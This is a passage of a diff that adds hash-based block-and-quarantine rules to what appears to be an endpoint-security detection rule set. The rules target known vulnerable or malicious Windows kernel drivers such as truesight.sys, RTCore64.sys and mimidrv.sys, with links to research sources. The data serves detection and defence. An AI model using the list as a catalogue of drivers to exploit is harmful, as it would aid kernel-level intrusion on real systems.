"2026-03-23T11:45:30.824224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f56a17f13eaa76384ebb5586f5e63b24729f90888fd5be9c9ee3a39690f428b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab70ba02-f666-591a-939b-345777165767", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977694Z", + "creation_date": "2026-03-23T11:45:29.977696Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977702Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9345c3af554c06aa949492f1642a7a03404956d2952cca8a68658b62dccb0825", + "comment": "Malicious Kernel Driver (aka ndislan.sys) [https://www.loldrivers.io/drivers/ca1e8664-841f-4e4b-9e67-3f515cc249c6/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab84e72a-9bec-52d3-8783-abcb2b7aed57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621479Z", + "creation_date": "2026-03-23T11:45:29.621481Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621486Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "ce231637422709d927fb6fa0c4f2215b9c0e3ebbd951fb2fa97b8e64da479b96", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab85c293-15d1-53a7-a935-d7957892279a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819830Z", + "creation_date": "2026-03-23T11:45:30.819832Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819837Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "642857fc8d737e92db8771e46e8638a37d9743928c959ed056c15427c6197a54", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab8dcca1-cc32-50bd-a233-0094b7e0ceec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.608245Z", + "creation_date": "2026-03-23T11:45:29.608247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608252Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90c9e8bed1aeb314636a7bc86e26e484eade53c744d2e8a7a316459709760a5e", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab90e8aa-4d3e-5b98-8137-653a0784e2bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455891Z", + "creation_date": "2026-03-23T11:45:30.455895Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455904Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bf77c52cc0e6b1b0f2b8ceffaadb156673768146950401c27fbfd7e2bedd618", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ab942bca-b90e-53f7-8b3b-1e4a55ef62a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476174Z", + "creation_date": "2026-03-23T11:45:30.476177Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d04c72fd31e7d36b101ad30e119e14f6df9cbc7a761526da9b77f9e0b9888bc4", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab94ee49-57bf-59a7-943d-e69b5a5b8aca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147394Z", + "creation_date": "2026-03-23T11:45:31.147396Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147402Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "add4f9ca3e0cb3a429dc5b5c1b0e035483aa73a8b4343933da3d6fccbe26cf13", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab9b3a91-da92-5ed7-b23f-da4c8f00dde3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464626Z", + "creation_date": "2026-03-23T11:45:30.464629Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "64d4370843a07e25d4ceb68816015efcaeca9429bb5bb692a88e615b48c7da96", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abaac0c3-c86f-5cee-b18a-7511f5021c99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980976Z", + "creation_date": "2026-03-23T11:45:29.980977Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980983Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9bd8b0289955a6eb791f45c3203f08a64cbd457fd1b9d598a6fbbca5d0372e36", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abacd25c-6918-565d-aa0f-f0e2f8831dd1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970366Z", + "creation_date": "2026-03-23T11:45:29.970368Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970373Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b61b09f6313a567b6fcdec2e961f6a118a2314aed5519dd2b9830c4ace758c03", + "comment": "Mimikatz kernel driver (aka 
mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abb1658e-0415-5854-9016-a974522c365f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140565Z", + "creation_date": "2026-03-23T11:45:31.140567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140572Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1971f32f211b10e0b13b1fc29389704ee30f5a0af76e8b44bbc36cc3a0a75ca0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abb674bf-d003-5d6d-bda6-bd9d518bcee5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144411Z", + "creation_date": "2026-03-23T11:45:31.144413Z", 
+ "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd0c0af7261a6ca81fa1981e4e51b6502216e75f9fc80af30d8b4c8bd6958669", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abc988bb-db47-5053-a44c-22d089808b27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460664Z", + "creation_date": "2026-03-23T11:45:30.460667Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cedd5815bb6e20d3697103cfc0275f5015f469e6007e8cac16892c97731c695", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abca81ef-5292-55ef-9a00-8486d991ccf5", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976464Z", + "creation_date": "2026-03-23T11:45:29.976466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976472Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1716d4c523aeea9703032ca93eb9668b9a16f542c00cec248b0a1c132d80bb15", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abe415a1-2eff-5129-9a7d-7b4946486789", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150071Z", + "creation_date": "2026-03-23T11:45:31.150073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150078Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ee93b7d88c8b12daa635eabbf410dcc85ca59d09236bc370e9d3cde005d02fa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abeb7395-225a-57f3-b3c0-39b9c726e960", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978248Z", + "creation_date": 
"2026-03-23T11:45:29.978250Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978255Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f", + "comment": "Malicious Kernel Driver (aka wantd_2.sys) [https://www.loldrivers.io/drivers/aa687f89-4f3b-4b59-b64e-fee5e2ae2310/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abf38035-9853-5f02-8d5c-5c258db158db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611694Z", + "creation_date": "2026-03-23T11:45:29.611696Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611701Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68b0a239031b158e2927bb5dc8844b662cb4616ee8c1363fa729aa8fa0d86cff", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "abfa4c63-ffc3-588d-9628-4e25ba6b93b4", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820271Z", + "creation_date": "2026-03-23T11:45:31.820274Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "906dbf004c8a502c821be0783c09c0834f0def4adf74402b5181bad93fb04d19", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac1102a0-ca1d-54a8-b069-1371c83754e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154587Z", + "creation_date": "2026-03-23T11:45:31.154589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154594Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6d0573dd11a89a44ce660398984afd191466af7f3fe96e719ffb4b7fe590fa5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac1a02a5-e2f0-5f95-be88-8007595339c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808414Z", + "creation_date": "2026-03-23T11:45:31.808416Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808422Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d01999f5cdc1e01f5e426d1464e2ee6f0c16f8734a669f9bef5c8428e8671c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac239dd8-d616-5b79-9439-a3b3ed002616", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479722Z", + "creation_date": "2026-03-23T11:45:30.479724Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479729Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0f1fbadc1d7a77557d3d836f7698bd986a3ec9fc5d534ad3403970f071176f7", + "comment": "Malicious Kernel Driver (aka a9df5964635ef8bd567ae487c3d214c4.sys) [https://www.loldrivers.io/drivers/ac62e709-4aa5-41f4-87b1-b811283d70d1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac308b0a-0da6-5a63-95a9-a36d91b82959", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608439Z", + "creation_date": "2026-03-23T11:45:29.608441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608447Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9dab4b6fddc8e1ec0a186aa8382b184a5d52cfcabaaf04ff9e3767021eb09cf4", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac33c23a-b63c-5a85-8f66-416d184c93d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479494Z", + "creation_date": "2026-03-23T11:45:30.479496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f83465d2c38c20a3854d86c293867de3baae2f90419dbe82405bc9f9dd7bbd8c", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac34a4bb-cabb-5b12-bfbb-06211fb17fe6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467707Z", + "creation_date": "2026-03-23T11:45:30.467710Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467719Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf2ab728d27075bf2245ddc3257ad8df5179c8c4a449493ea995af9a979d6a2e", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac500047-8912-5920-8a48-b05494b6776f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 